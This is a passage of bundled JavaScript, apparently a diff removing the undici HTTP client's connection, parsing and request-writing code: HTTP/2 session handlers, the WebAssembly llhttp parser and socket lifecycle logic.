"frameError" received - type ${type}, code ${code}`) - - if (id === 0) { - this[kSocket][kError] = err - onError(this[kClient], err) - } -} - -function onHttp2SessionEnd () { - util.destroy(this, new SocketError('other side closed')) - util.destroy(this[kSocket], new SocketError('other side closed')) -} - -function onHTTP2GoAway (code) { - const client = this[kClient] - const err = new InformationalError(`HTTP/2: "GOAWAY" frame received with code ${code}`) - client[kSocket] = null - client[kHTTP2Session] = null - - if 
(client.destroyed) { - assert(this[kPending] === 0) - - // Fail entire queue. - const requests = client[kQueue].splice(client[kRunningIdx]) - for (let i = 0; i < requests.length; i++) { - const request = requests[i] - errorRequest(this, request, err) - } - } else if (client[kRunning] > 0) { - // Fail head of pipeline. - const request = client[kQueue][client[kRunningIdx]] - client[kQueue][client[kRunningIdx]++] = null - - errorRequest(client, request, err) - } - - client[kPendingIdx] = client[kRunningIdx] - - assert(client[kRunning] === 0) - - client.emit('disconnect', - client[kUrl], - [client], - err - ) - - resume(client) -} - -const constants = __nccwpck_require__(953) -const createRedirectInterceptor = __nccwpck_require__(8861) -const EMPTY_BUF = Buffer.alloc(0) - -async function lazyllhttp () { - const llhttpWasmData = process.env.JEST_WORKER_ID ? __nccwpck_require__(1145) : undefined - - let mod - try { - mod = await WebAssembly.compile(Buffer.from(__nccwpck_require__(5627), 'base64')) - } catch (e) { - /* istanbul ignore next */ - - // We could check if the error was caused by the simd option not - // being enabled, but the occurring of this other error - // * https://github.com/emscripten-core/emscripten/issues/11495 - // got me to remove that check to avoid breaking Node 12. 
- mod = await WebAssembly.compile(Buffer.from(llhttpWasmData || __nccwpck_require__(1145), 'base64')) - } - - return await WebAssembly.instantiate(mod, { - env: { - /* eslint-disable camelcase */ - - wasm_on_url: (p, at, len) => { - /* istanbul ignore next */ - return 0 - }, - wasm_on_status: (p, at, len) => { - assert.strictEqual(currentParser.ptr, p) - const start = at - currentBufferPtr + currentBufferRef.byteOffset - return currentParser.onStatus(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 - }, - wasm_on_message_begin: (p) => { - assert.strictEqual(currentParser.ptr, p) - return currentParser.onMessageBegin() || 0 - }, - wasm_on_header_field: (p, at, len) => { - assert.strictEqual(currentParser.ptr, p) - const start = at - currentBufferPtr + currentBufferRef.byteOffset - return currentParser.onHeaderField(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 - }, - wasm_on_header_value: (p, at, len) => { - assert.strictEqual(currentParser.ptr, p) - const start = at - currentBufferPtr + currentBufferRef.byteOffset - return currentParser.onHeaderValue(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 - }, - wasm_on_headers_complete: (p, statusCode, upgrade, shouldKeepAlive) => { - assert.strictEqual(currentParser.ptr, p) - return currentParser.onHeadersComplete(statusCode, Boolean(upgrade), Boolean(shouldKeepAlive)) || 0 - }, - wasm_on_body: (p, at, len) => { - assert.strictEqual(currentParser.ptr, p) - const start = at - currentBufferPtr + currentBufferRef.byteOffset - return currentParser.onBody(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 - }, - wasm_on_message_complete: (p) => { - assert.strictEqual(currentParser.ptr, p) - return currentParser.onMessageComplete() || 0 - } - - /* eslint-enable camelcase */ - } - }) -} - -let llhttpInstance = null -let llhttpPromise = lazyllhttp() -llhttpPromise.catch() - -let currentParser = null -let currentBufferRef = null -let currentBufferSize = 0 -let currentBufferPtr = null - -const 
TIMEOUT_HEADERS = 1 -const TIMEOUT_BODY = 2 -const TIMEOUT_IDLE = 3 - -class Parser { - constructor (client, socket, { exports }) { - assert(Number.isFinite(client[kMaxHeadersSize]) && client[kMaxHeadersSize] > 0) - - this.llhttp = exports - this.ptr = this.llhttp.llhttp_alloc(constants.TYPE.RESPONSE) - this.client = client - this.socket = socket - this.timeout = null - this.timeoutValue = null - this.timeoutType = null - this.statusCode = null - this.statusText = '' - this.upgrade = false - this.headers = [] - this.headersSize = 0 - this.headersMaxSize = client[kMaxHeadersSize] - this.shouldKeepAlive = false - this.paused = false - this.resume = this.resume.bind(this) - - this.bytesRead = 0 - - this.keepAlive = '' - this.contentLength = '' - this.connection = '' - this.maxResponseSize = client[kMaxResponseSize] - } - - setTimeout (value, type) { - this.timeoutType = type - if (value !== this.timeoutValue) { - timers.clearTimeout(this.timeout) - if (value) { - this.timeout = timers.setTimeout(onParserTimeout, value, this) - // istanbul ignore else: only for jest - if (this.timeout.unref) { - this.timeout.unref() - } - } else { - this.timeout = null - } - this.timeoutValue = value - } else if (this.timeout) { - // istanbul ignore else: only for jest - if (this.timeout.refresh) { - this.timeout.refresh() - } - } - } - - resume () { - if (this.socket.destroyed || !this.paused) { - return - } - - assert(this.ptr != null) - assert(currentParser == null) - - this.llhttp.llhttp_resume(this.ptr) - - assert(this.timeoutType === TIMEOUT_BODY) - if (this.timeout) { - // istanbul ignore else: only for jest - if (this.timeout.refresh) { - this.timeout.refresh() - } - } - - this.paused = false - this.execute(this.socket.read() || EMPTY_BUF) // Flush parser. 
- this.readMore() - } - - readMore () { - while (!this.paused && this.ptr) { - const chunk = this.socket.read() - if (chunk === null) { - break - } - this.execute(chunk) - } - } - - execute (data) { - assert(this.ptr != null) - assert(currentParser == null) - assert(!this.paused) - - const { socket, llhttp } = this - - if (data.length > currentBufferSize) { - if (currentBufferPtr) { - llhttp.free(currentBufferPtr) - } - currentBufferSize = Math.ceil(data.length / 4096) * 4096 - currentBufferPtr = llhttp.malloc(currentBufferSize) - } - - new Uint8Array(llhttp.memory.buffer, currentBufferPtr, currentBufferSize).set(data) - - // Call `execute` on the wasm parser. - // We pass the `llhttp_parser` pointer address, the pointer address of buffer view data, - // and finally the length of bytes to parse. - // The return value is an error code or `constants.ERROR.OK`. - try { - let ret - - try { - currentBufferRef = data - currentParser = this - ret = llhttp.llhttp_execute(this.ptr, currentBufferPtr, data.length) - /* eslint-disable-next-line no-useless-catch */ - } catch (err) { - /* istanbul ignore next: difficult to make a test case for */ - throw err - } finally { - currentParser = null - currentBufferRef = null - } - - const offset = llhttp.llhttp_get_error_pos(this.ptr) - currentBufferPtr - - if (ret === constants.ERROR.PAUSED_UPGRADE) { - this.onUpgrade(data.slice(offset)) - } else if (ret === constants.ERROR.PAUSED) { - this.paused = true - socket.unshift(data.slice(offset)) - } else if (ret !== constants.ERROR.OK) { - const ptr = llhttp.llhttp_get_error_reason(this.ptr) - let message = '' - /* istanbul ignore else: difficult to make a test case for */ - if (ptr) { - const len = new Uint8Array(llhttp.memory.buffer, ptr).indexOf(0) - message = - 'Response does not match the HTTP/1.1 protocol (' + - Buffer.from(llhttp.memory.buffer, ptr, len).toString() + - ')' - } - throw new HTTPParserError(message, constants.ERROR[ret], data.slice(offset)) - } - } catch (err) { - 
util.destroy(socket, err) - } - } - - destroy () { - assert(this.ptr != null) - assert(currentParser == null) - - this.llhttp.llhttp_free(this.ptr) - this.ptr = null - - timers.clearTimeout(this.timeout) - this.timeout = null - this.timeoutValue = null - this.timeoutType = null - - this.paused = false - } - - onStatus (buf) { - this.statusText = buf.toString() - } - - onMessageBegin () { - const { socket, client } = this - - /* istanbul ignore next: difficult to make a test case for */ - if (socket.destroyed) { - return -1 - } - - const request = client[kQueue][client[kRunningIdx]] - if (!request) { - return -1 - } - } - - onHeaderField (buf) { - const len = this.headers.length - - if ((len & 1) === 0) { - this.headers.push(buf) - } else { - this.headers[len - 1] = Buffer.concat([this.headers[len - 1], buf]) - } - - this.trackHeader(buf.length) - } - - onHeaderValue (buf) { - let len = this.headers.length - - if ((len & 1) === 1) { - this.headers.push(buf) - len += 1 - } else { - this.headers[len - 1] = Buffer.concat([this.headers[len - 1], buf]) - } - - const key = this.headers[len - 2] - if (key.length === 10 && key.toString().toLowerCase() === 'keep-alive') { - this.keepAlive += buf.toString() - } else if (key.length === 10 && key.toString().toLowerCase() === 'connection') { - this.connection += buf.toString() - } else if (key.length === 14 && key.toString().toLowerCase() === 'content-length') { - this.contentLength += buf.toString() - } - - this.trackHeader(buf.length) - } - - trackHeader (len) { - this.headersSize += len - if (this.headersSize >= this.headersMaxSize) { - util.destroy(this.socket, new HeadersOverflowError()) - } - } - - onUpgrade (head) { - const { upgrade, client, socket, headers, statusCode } = this - - assert(upgrade) - - const request = client[kQueue][client[kRunningIdx]] - assert(request) - - assert(!socket.destroyed) - assert(socket === client[kSocket]) - assert(!this.paused) - assert(request.upgrade || request.method === 'CONNECT') - - 
this.statusCode = null - this.statusText = '' - this.shouldKeepAlive = null - - assert(this.headers.length % 2 === 0) - this.headers = [] - this.headersSize = 0 - - socket.unshift(head) - - socket[kParser].destroy() - socket[kParser] = null - - socket[kClient] = null - socket[kError] = null - socket - .removeListener('error', onSocketError) - .removeListener('readable', onSocketReadable) - .removeListener('end', onSocketEnd) - .removeListener('close', onSocketClose) - - client[kSocket] = null - client[kQueue][client[kRunningIdx]++] = null - client.emit('disconnect', client[kUrl], [client], new InformationalError('upgrade')) - - try { - request.onUpgrade(statusCode, headers, socket) - } catch (err) { - util.destroy(socket, err) - } - - resume(client) - } - - onHeadersComplete (statusCode, upgrade, shouldKeepAlive) { - const { client, socket, headers, statusText } = this - - /* istanbul ignore next: difficult to make a test case for */ - if (socket.destroyed) { - return -1 - } - - const request = client[kQueue][client[kRunningIdx]] - - /* istanbul ignore next: difficult to make a test case for */ - if (!request) { - return -1 - } - - assert(!this.upgrade) - assert(this.statusCode < 200) - - if (statusCode === 100) { - util.destroy(socket, new SocketError('bad response', util.getSocketInfo(socket))) - return -1 - } - - /* this can only happen if server is misbehaving */ - if (upgrade && !request.upgrade) { - util.destroy(socket, new SocketError('bad upgrade', util.getSocketInfo(socket))) - return -1 - } - - assert.strictEqual(this.timeoutType, TIMEOUT_HEADERS) - - this.statusCode = statusCode - this.shouldKeepAlive = ( - shouldKeepAlive || - // Override llhttp value which does not allow keepAlive for HEAD. - (request.method === 'HEAD' && !socket[kReset] && this.connection.toLowerCase() === 'keep-alive') - ) - - if (this.statusCode >= 200) { - const bodyTimeout = request.bodyTimeout != null - ? 
request.bodyTimeout - : client[kBodyTimeout] - this.setTimeout(bodyTimeout, TIMEOUT_BODY) - } else if (this.timeout) { - // istanbul ignore else: only for jest - if (this.timeout.refresh) { - this.timeout.refresh() - } - } - - if (request.method === 'CONNECT') { - assert(client[kRunning] === 1) - this.upgrade = true - return 2 - } - - if (upgrade) { - assert(client[kRunning] === 1) - this.upgrade = true - return 2 - } - - assert(this.headers.length % 2 === 0) - this.headers = [] - this.headersSize = 0 - - if (this.shouldKeepAlive && client[kPipelining]) { - const keepAliveTimeout = this.keepAlive ? util.parseKeepAliveTimeout(this.keepAlive) : null - - if (keepAliveTimeout != null) { - const timeout = Math.min( - keepAliveTimeout - client[kKeepAliveTimeoutThreshold], - client[kKeepAliveMaxTimeout] - ) - if (timeout <= 0) { - socket[kReset] = true - } else { - client[kKeepAliveTimeoutValue] = timeout - } - } else { - client[kKeepAliveTimeoutValue] = client[kKeepAliveDefaultTimeout] - } - } else { - // Stop more requests from being dispatched. - socket[kReset] = true - } - - const pause = request.onHeaders(statusCode, headers, this.resume, statusText) === false - - if (request.aborted) { - return -1 - } - - if (request.method === 'HEAD') { - return 1 - } - - if (statusCode < 200) { - return 1 - } - - if (socket[kBlocking]) { - socket[kBlocking] = false - resume(client) - } - - return pause ? 
constants.ERROR.PAUSED : 0 - } - - onBody (buf) { - const { client, socket, statusCode, maxResponseSize } = this - - if (socket.destroyed) { - return -1 - } - - const request = client[kQueue][client[kRunningIdx]] - assert(request) - - assert.strictEqual(this.timeoutType, TIMEOUT_BODY) - if (this.timeout) { - // istanbul ignore else: only for jest - if (this.timeout.refresh) { - this.timeout.refresh() - } - } - - assert(statusCode >= 200) - - if (maxResponseSize > -1 && this.bytesRead + buf.length > maxResponseSize) { - util.destroy(socket, new ResponseExceededMaxSizeError()) - return -1 - } - - this.bytesRead += buf.length - - if (request.onData(buf) === false) { - return constants.ERROR.PAUSED - } - } - - onMessageComplete () { - const { client, socket, statusCode, upgrade, headers, contentLength, bytesRead, shouldKeepAlive } = this - - if (socket.destroyed && (!statusCode || shouldKeepAlive)) { - return -1 - } - - if (upgrade) { - return - } - - const request = client[kQueue][client[kRunningIdx]] - assert(request) - - assert(statusCode >= 100) - - this.statusCode = null - this.statusText = '' - this.bytesRead = 0 - this.contentLength = '' - this.keepAlive = '' - this.connection = '' - - assert(this.headers.length % 2 === 0) - this.headers = [] - this.headersSize = 0 - - if (statusCode < 200) { - return - } - - /* istanbul ignore next: should be handled by llhttp? */ - if (request.method !== 'HEAD' && contentLength && bytesRead !== parseInt(contentLength, 10)) { - util.destroy(socket, new ResponseContentLengthMismatchError()) - return -1 - } - - request.onComplete(headers) - - client[kQueue][client[kRunningIdx]++] = null - - if (socket[kWriting]) { - assert.strictEqual(client[kRunning], 0) - // Response completed before request. 
- util.destroy(socket, new InformationalError('reset')) - return constants.ERROR.PAUSED - } else if (!shouldKeepAlive) { - util.destroy(socket, new InformationalError('reset')) - return constants.ERROR.PAUSED - } else if (socket[kReset] && client[kRunning] === 0) { - // Destroy socket once all requests have completed. - // The request at the tail of the pipeline is the one - // that requested reset and no further requests should - // have been queued since then. - util.destroy(socket, new InformationalError('reset')) - return constants.ERROR.PAUSED - } else if (client[kPipelining] === 1) { - // We must wait a full event loop cycle to reuse this socket to make sure - // that non-spec compliant servers are not closing the connection even if they - // said they won't. - setImmediate(resume, client) - } else { - resume(client) - } - } -} - -function onParserTimeout (parser) { - const { socket, timeoutType, client } = parser - - /* istanbul ignore else */ - if (timeoutType === TIMEOUT_HEADERS) { - if (!socket[kWriting] || socket.writableNeedDrain || client[kRunning] > 1) { - assert(!parser.paused, 'cannot be paused while waiting for headers') - util.destroy(socket, new HeadersTimeoutError()) - } - } else if (timeoutType === TIMEOUT_BODY) { - if (!parser.paused) { - util.destroy(socket, new BodyTimeoutError()) - } - } else if (timeoutType === TIMEOUT_IDLE) { - assert(client[kRunning] === 0 && client[kKeepAliveTimeoutValue]) - util.destroy(socket, new InformationalError('socket idle timeout')) - } -} - -function onSocketReadable () { - const { [kParser]: parser } = this - if (parser) { - parser.readMore() - } -} - -function onSocketError (err) { - const { [kClient]: client, [kParser]: parser } = this - - assert(err.code !== 'ERR_TLS_CERT_ALTNAME_INVALID') - - if (client[kHTTPConnVersion] !== 'h2') { - // On Mac OS, we get an ECONNRESET even if there is a full body to be forwarded - // to the user. 
- if (err.code === 'ECONNRESET' && parser.statusCode && !parser.shouldKeepAlive) { - // We treat all incoming data so for as a valid response. - parser.onMessageComplete() - return - } - } - - this[kError] = err - - onError(this[kClient], err) -} - -function onError (client, err) { - if ( - client[kRunning] === 0 && - err.code !== 'UND_ERR_INFO' && - err.code !== 'UND_ERR_SOCKET' - ) { - // Error is not caused by running request and not a recoverable - // socket error. - - assert(client[kPendingIdx] === client[kRunningIdx]) - - const requests = client[kQueue].splice(client[kRunningIdx]) - for (let i = 0; i < requests.length; i++) { - const request = requests[i] - errorRequest(client, request, err) - } - assert(client[kSize] === 0) - } -} - -function onSocketEnd () { - const { [kParser]: parser, [kClient]: client } = this - - if (client[kHTTPConnVersion] !== 'h2') { - if (parser.statusCode && !parser.shouldKeepAlive) { - // We treat all incoming data so far as a valid response. - parser.onMessageComplete() - return - } - } - - util.destroy(this, new SocketError('other side closed', util.getSocketInfo(this))) -} - -function onSocketClose () { - const { [kClient]: client, [kParser]: parser } = this - - if (client[kHTTPConnVersion] === 'h1' && parser) { - if (!this[kError] && parser.statusCode && !parser.shouldKeepAlive) { - // We treat all incoming data so far as a valid response. - parser.onMessageComplete() - } - - this[kParser].destroy() - this[kParser] = null - } - - const err = this[kError] || new SocketError('closed', util.getSocketInfo(this)) - - client[kSocket] = null - - if (client.destroyed) { - assert(client[kPending] === 0) - - // Fail entire queue. - const requests = client[kQueue].splice(client[kRunningIdx]) - for (let i = 0; i < requests.length; i++) { - const request = requests[i] - errorRequest(client, request, err) - } - } else if (client[kRunning] > 0 && err.code !== 'UND_ERR_INFO') { - // Fail head of pipeline. 
- const request = client[kQueue][client[kRunningIdx]] - client[kQueue][client[kRunningIdx]++] = null - - errorRequest(client, request, err) - } - - client[kPendingIdx] = client[kRunningIdx] - - assert(client[kRunning] === 0) - - client.emit('disconnect', client[kUrl], [client], err) - - resume(client) -} - -async function connect (client) { - assert(!client[kConnecting]) - assert(!client[kSocket]) - - let { host, hostname, protocol, port } = client[kUrl] - - // Resolve ipv6 - if (hostname[0] === '[') { - const idx = hostname.indexOf(']') - - assert(idx !== -1) - const ip = hostname.substring(1, idx) - - assert(net.isIP(ip)) - hostname = ip - } - - client[kConnecting] = true - - if (channels.beforeConnect.hasSubscribers) { - channels.beforeConnect.publish({ - connectParams: { - host, - hostname, - protocol, - port, - servername: client[kServerName], - localAddress: client[kLocalAddress] - }, - connector: client[kConnector] - }) - } - - try { - const socket = await new Promise((resolve, reject) => { - client[kConnector]({ - host, - hostname, - protocol, - port, - servername: client[kServerName], - localAddress: client[kLocalAddress] - }, (err, socket) => { - if (err) { - reject(err) - } else { - resolve(socket) - } - }) - }) - - if (client.destroyed) { - util.destroy(socket.on('error', () => {}), new ClientDestroyedError()) - return - } - - client[kConnecting] = false - - assert(socket) - - const isH2 = socket.alpnProtocol === 'h2' - if (isH2) { - if (!h2ExperimentalWarned) { - h2ExperimentalWarned = true - process.emitWarning('H2 support is experimental, expect them to change at any time.', { - code: 'UNDICI-H2' - }) - } - - const session = http2.connect(client[kUrl], { - createConnection: () => socket, - peerMaxConcurrentStreams: client[kHTTP2SessionState].maxConcurrentStreams - }) - - client[kHTTPConnVersion] = 'h2' - session[kClient] = client - session[kSocket] = socket - session.on('error', onHttp2SessionError) - session.on('frameError', onHttp2FrameError) - 
session.on('end', onHttp2SessionEnd) - session.on('goaway', onHTTP2GoAway) - session.on('close', onSocketClose) - session.unref() - - client[kHTTP2Session] = session - socket[kHTTP2Session] = session - } else { - if (!llhttpInstance) { - llhttpInstance = await llhttpPromise - llhttpPromise = null - } - - socket[kNoRef] = false - socket[kWriting] = false - socket[kReset] = false - socket[kBlocking] = false - socket[kParser] = new Parser(client, socket, llhttpInstance) - } - - socket[kCounter] = 0 - socket[kMaxRequests] = client[kMaxRequests] - socket[kClient] = client - socket[kError] = null - - socket - .on('error', onSocketError) - .on('readable', onSocketReadable) - .on('end', onSocketEnd) - .on('close', onSocketClose) - - client[kSocket] = socket - - if (channels.connected.hasSubscribers) { - channels.connected.publish({ - connectParams: { - host, - hostname, - protocol, - port, - servername: client[kServerName], - localAddress: client[kLocalAddress] - }, - connector: client[kConnector], - socket - }) - } - client.emit('connect', client[kUrl], [client]) - } catch (err) { - if (client.destroyed) { - return - } - - client[kConnecting] = false - - if (channels.connectError.hasSubscribers) { - channels.connectError.publish({ - connectParams: { - host, - hostname, - protocol, - port, - servername: client[kServerName], - localAddress: client[kLocalAddress] - }, - connector: client[kConnector], - error: err - }) - } - - if (err.code === 'ERR_TLS_CERT_ALTNAME_INVALID') { - assert(client[kRunning] === 0) - while (client[kPending] > 0 && client[kQueue][client[kPendingIdx]].servername === client[kServerName]) { - const request = client[kQueue][client[kPendingIdx]++] - errorRequest(client, request, err) - } - } else { - onError(client, err) - } - - client.emit('connectionError', client[kUrl], [client], err) - } - - resume(client) -} - -function emitDrain (client) { - client[kNeedDrain] = 0 - client.emit('drain', client[kUrl], [client]) -} - -function resume (client, sync) { 
- if (client[kResuming] === 2) { - return - } - - client[kResuming] = 2 - - _resume(client, sync) - client[kResuming] = 0 - - if (client[kRunningIdx] > 256) { - client[kQueue].splice(0, client[kRunningIdx]) - client[kPendingIdx] -= client[kRunningIdx] - client[kRunningIdx] = 0 - } -} - -function _resume (client, sync) { - while (true) { - if (client.destroyed) { - assert(client[kPending] === 0) - return - } - - if (client[kClosedResolve] && !client[kSize]) { - client[kClosedResolve]() - client[kClosedResolve] = null - return - } - - const socket = client[kSocket] - - if (socket && !socket.destroyed && socket.alpnProtocol !== 'h2') { - if (client[kSize] === 0) { - if (!socket[kNoRef] && socket.unref) { - socket.unref() - socket[kNoRef] = true - } - } else if (socket[kNoRef] && socket.ref) { - socket.ref() - socket[kNoRef] = false - } - - if (client[kSize] === 0) { - if (socket[kParser].timeoutType !== TIMEOUT_IDLE) { - socket[kParser].setTimeout(client[kKeepAliveTimeoutValue], TIMEOUT_IDLE) - } - } else if (client[kRunning] > 0 && socket[kParser].statusCode < 200) { - if (socket[kParser].timeoutType !== TIMEOUT_HEADERS) { - const request = client[kQueue][client[kRunningIdx]] - const headersTimeout = request.headersTimeout != null - ? 
request.headersTimeout - : client[kHeadersTimeout] - socket[kParser].setTimeout(headersTimeout, TIMEOUT_HEADERS) - } - } - } - - if (client[kBusy]) { - client[kNeedDrain] = 2 - } else if (client[kNeedDrain] === 2) { - if (sync) { - client[kNeedDrain] = 1 - process.nextTick(emitDrain, client) - } else { - emitDrain(client) - } - continue - } - - if (client[kPending] === 0) { - return - } - - if (client[kRunning] >= (client[kPipelining] || 1)) { - return - } - - const request = client[kQueue][client[kPendingIdx]] - - if (client[kUrl].protocol === 'https:' && client[kServerName] !== request.servername) { - if (client[kRunning] > 0) { - return - } - - client[kServerName] = request.servername - - if (socket && socket.servername !== request.servername) { - util.destroy(socket, new InformationalError('servername changed')) - return - } - } - - if (client[kConnecting]) { - return - } - - if (!socket && !client[kHTTP2Session]) { - connect(client) - return - } - - if (socket.destroyed || socket[kWriting] || socket[kReset] || socket[kBlocking]) { - return - } - - if (client[kRunning] > 0 && !request.idempotent) { - // Non-idempotent request cannot be retried. - // Ensure that no other requests are inflight and - // could cause failure. - return - } - - if (client[kRunning] > 0 && (request.upgrade || request.method === 'CONNECT')) { - // Don't dispatch an upgrade until all preceding requests have completed. - // A misbehaving server might upgrade the connection before all pipelined - // request has completed. - return - } - - if (client[kRunning] > 0 && util.bodyLength(request.body) !== 0 && - (util.isStream(request.body) || util.isAsyncIterable(request.body))) { - // Request with stream or iterator body can error while other requests - // are inflight and indirectly error those as well. - // Ensure this doesn't happen by waiting for inflight - // to complete before dispatching. - - // Request with stream or iterator body cannot be retried. 
- // Ensure that no other requests are inflight and - // could cause failure. - return - } - - if (!request.aborted && write(client, request)) { - client[kPendingIdx]++ - } else { - client[kQueue].splice(client[kPendingIdx], 1) - } - } -} - -// https://www.rfc-editor.org/rfc/rfc7230#section-3.3.2 -function shouldSendContentLength (method) { - return method !== 'GET' && method !== 'HEAD' && method !== 'OPTIONS' && method !== 'TRACE' && method !== 'CONNECT' -} - -function write (client, request) { - if (client[kHTTPConnVersion] === 'h2') { - writeH2(client, client[kHTTP2Session], request) - return - } - - const { body, method, path, host, upgrade, headers, blocking, reset } = request - - // https://tools.ietf.org/html/rfc7231#section-4.3.1 - // https://tools.ietf.org/html/rfc7231#section-4.3.2 - // https://tools.ietf.org/html/rfc7231#section-4.3.5 - - // Sending a payload body on a request that does not - // expect it can cause undefined behavior on some - // servers and corrupt connection state. Do not - // re-use the connection for further requests. - - const expectsPayload = ( - method === 'PUT' || - method === 'POST' || - method === 'PATCH' - ) - - if (body && typeof body.read === 'function') { - // Try to read EOF in order to get length. - body.read(0) - } - - const bodyLength = util.bodyLength(body) - - let contentLength = bodyLength - - if (contentLength === null) { - contentLength = request.contentLength - } - - if (contentLength === 0 && !expectsPayload) { - // https://tools.ietf.org/html/rfc7230#section-3.3.2 - // A user agent SHOULD NOT send a Content-Length header field when - // the request message does not contain a payload body and the method - // semantics do not anticipate such a body. - - contentLength = null - } - - // https://github.com/nodejs/undici/issues/2046 - // A user agent may send a Content-Length header with 0 value, this should be allowed. 
- if (shouldSendContentLength(method) && contentLength > 0 && request.contentLength !== null && request.contentLength !== contentLength) { - if (client[kStrictContentLength]) { - errorRequest(client, request, new RequestContentLengthMismatchError()) - return false - } - - process.emitWarning(new RequestContentLengthMismatchError()) - } - - const socket = client[kSocket] - - try { - request.onConnect((err) => { - if (request.aborted || request.completed) { - return - } - - errorRequest(client, request, err || new RequestAbortedError()) - - util.destroy(socket, new InformationalError('aborted')) - }) - } catch (err) { - errorRequest(client, request, err) - } - - if (request.aborted) { - return false - } - - if (method === 'HEAD') { - // https://github.com/mcollina/undici/issues/258 - // Close after a HEAD request to interop with misbehaving servers - // that may send a body in the response. - - socket[kReset] = true - } - - if (upgrade || method === 'CONNECT') { - // On CONNECT or upgrade, block pipeline from dispatching further - // requests on this connection. 
- - socket[kReset] = true - } - - if (reset != null) { - socket[kReset] = reset - } - - if (client[kMaxRequests] && socket[kCounter]++ >= client[kMaxRequests]) { - socket[kReset] = true - } - - if (blocking) { - socket[kBlocking] = true - } - - let header = `${method} ${path} HTTP/1.1\r\n` - - if (typeof host === 'string') { - header += `host: ${host}\r\n` - } else { - header += client[kHostHeader] - } - - if (upgrade) { - header += `connection: upgrade\r\nupgrade: ${upgrade}\r\n` - } else if (client[kPipelining] && !socket[kReset]) { - header += 'connection: keep-alive\r\n' - } else { - header += 'connection: close\r\n' - } - - if (headers) { - header += headers - } - - if (channels.sendHeaders.hasSubscribers) { - channels.sendHeaders.publish({ request, headers: header, socket }) - } - - /* istanbul ignore else: assertion */ - if (!body || bodyLength === 0) { - if (contentLength === 0) { - socket.write(`${header}content-length: 0\r\n\r\n`, 'latin1') - } else { - assert(contentLength === null, 'no body must not have content length') - socket.write(`${header}\r\n`, 'latin1') - } - request.onRequestSent() - } else if (util.isBuffer(body)) { - assert(contentLength === body.byteLength, 'buffer body must have content length') - - socket.cork() - socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 'latin1') - socket.write(body) - socket.uncork() - request.onBodySent(body) - request.onRequestSent() - if (!expectsPayload) { - socket[kReset] = true - } - } else if (util.isBlobLike(body)) { - if (typeof body.stream === 'function') { - writeIterable({ body: body.stream(), client, request, socket, contentLength, header, expectsPayload }) - } else { - writeBlob({ body, client, request, socket, contentLength, header, expectsPayload }) - } - } else if (util.isStream(body)) { - writeStream({ body, client, request, socket, contentLength, header, expectsPayload }) - } else if (util.isIterable(body)) { - writeIterable({ body, client, request, socket, contentLength, 
header, expectsPayload }) - } else { - assert(false) - } - - return true -} - -function writeH2 (client, session, request) { - const { body, method, path, host, upgrade, expectContinue, signal, headers: reqHeaders } = request - - let headers - if (typeof reqHeaders === 'string') headers = Request[kHTTP2CopyHeaders](reqHeaders.trim()) - else headers = reqHeaders - - if (upgrade) { - errorRequest(client, request, new Error('Upgrade not supported for H2')) - return false - } - - try { - // TODO(HTTP/2): Should we call onConnect immediately or on stream ready event? - request.onConnect((err) => { - if (request.aborted || request.completed) { - return - } - - errorRequest(client, request, err || new RequestAbortedError()) - }) - } catch (err) { - errorRequest(client, request, err) - } - - if (request.aborted) { - return false - } - - /** @type {import('node:http2').ClientHttp2Stream} */ - let stream - const h2State = client[kHTTP2SessionState] - - headers[HTTP2_HEADER_AUTHORITY] = host || client[kHost] - headers[HTTP2_HEADER_METHOD] = method - - if (method === 'CONNECT') { - session.ref() - // we are already connected, streams are pending, first request - // will create a new stream. 
We trigger a request to create the stream and wait until - // `ready` event is triggered - // We disabled endStream to allow the user to write to the stream - stream = session.request(headers, { endStream: false, signal }) - - if (stream.id && !stream.pending) { - request.onUpgrade(null, null, stream) - ++h2State.openStreams - } else { - stream.once('ready', () => { - request.onUpgrade(null, null, stream) - ++h2State.openStreams - }) - } - - stream.once('close', () => { - h2State.openStreams -= 1 - // TODO(HTTP/2): unref only if current streams count is 0 - if (h2State.openStreams === 0) session.unref() - }) - - return true - } - - // https://tools.ietf.org/html/rfc7540#section-8.3 - // :path and :scheme headers must be omited when sending CONNECT - - headers[HTTP2_HEADER_PATH] = path - headers[HTTP2_HEADER_SCHEME] = 'https' - - // https://tools.ietf.org/html/rfc7231#section-4.3.1 - // https://tools.ietf.org/html/rfc7231#section-4.3.2 - // https://tools.ietf.org/html/rfc7231#section-4.3.5 - - // Sending a payload body on a request that does not - // expect it can cause undefined behavior on some - // servers and corrupt connection state. Do not - // re-use the connection for further requests. - - const expectsPayload = ( - method === 'PUT' || - method === 'POST' || - method === 'PATCH' - ) - - if (body && typeof body.read === 'function') { - // Try to read EOF in order to get length. - body.read(0) - } - - let contentLength = util.bodyLength(body) - - if (contentLength == null) { - contentLength = request.contentLength - } - - if (contentLength === 0 || !expectsPayload) { - // https://tools.ietf.org/html/rfc7230#section-3.3.2 - // A user agent SHOULD NOT send a Content-Length header field when - // the request message does not contain a payload body and the method - // semantics do not anticipate such a body. 
- - contentLength = null - } - - // https://github.com/nodejs/undici/issues/2046 - // A user agent may send a Content-Length header with 0 value, this should be allowed. - if (shouldSendContentLength(method) && contentLength > 0 && request.contentLength != null && request.contentLength !== contentLength) { - if (client[kStrictContentLength]) { - errorRequest(client, request, new RequestContentLengthMismatchError()) - return false - } - - process.emitWarning(new RequestContentLengthMismatchError()) - } - - if (contentLength != null) { - assert(body, 'no body must not have content length') - headers[HTTP2_HEADER_CONTENT_LENGTH] = `${contentLength}` - } - - session.ref() - - const shouldEndStream = method === 'GET' || method === 'HEAD' - if (expectContinue) { - headers[HTTP2_HEADER_EXPECT] = '100-continue' - stream = session.request(headers, { endStream: shouldEndStream, signal }) - - stream.once('continue', writeBodyH2) - } else { - stream = session.request(headers, { - endStream: shouldEndStream, - signal - }) - writeBodyH2() - } - - // Increment counter as we have new several streams open - ++h2State.openStreams - - stream.once('response', headers => { - const { [HTTP2_HEADER_STATUS]: statusCode, ...realHeaders } = headers - - if (request.onHeaders(Number(statusCode), realHeaders, stream.resume.bind(stream), '') === false) { - stream.pause() - } - }) - - stream.once('end', () => { - request.onComplete([]) - }) - - stream.on('data', (chunk) => { - if (request.onData(chunk) === false) { - stream.pause() - } - }) - - stream.once('close', () => { - h2State.openStreams -= 1 - // TODO(HTTP/2): unref only if current streams count is 0 - if (h2State.openStreams === 0) { - session.unref() 